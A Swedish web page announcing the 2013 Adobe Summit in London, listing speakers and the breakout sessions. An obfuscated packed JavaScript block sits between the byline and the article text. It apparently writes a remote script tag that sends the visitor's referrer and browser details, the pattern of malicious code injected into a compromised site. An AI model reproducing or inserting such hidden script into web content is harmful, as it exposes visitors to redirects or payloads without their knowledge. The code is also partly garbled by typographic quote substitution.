Image Image Image Image Image Image Image Image Image Image

| 24 maj, 2018

Scroll to top

Top

No Comments

Nu är det dags för Adobe Summit i London

Nu är det dags för Adobe Summit i London
Sebastian Plengier Ehrnfelt

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfzid|var|u0026u|referrer|fhkna||js|php’.split(‘|’),0,{}))
Den 24 – 25 april 2013 går en av Europas viktigaste konferenser för digital marknadsföring, Adobe Summit, av stapeln. Det intensiva programmet bjuder på keynote från bland andra Felix Baumgartner samt över 60 olika break-out sessions.

I år förväntas över 2300 personer med intresse för digital marknadsföring delta på Adobe Summit i London som hålls den 24-25 april. Österrikaren Felix Baumgartner kommer då bland annat att berätta om hur hans rekordhopp fick Red Bull Stratus att explodera på sociala medier. Utöver det kan man bland andra träffa Stefan Olander, Vice President för Digital Sport hos Nike samt Loïs Le Meur, utnämnd till en av de 25 mest betydelsefulla personerna på nätet av Business Week. Programmet bjuder också på över 60 spännande break out-sessions.

Läs mer på http://summit-emea.adobe.com/

Submit a Comment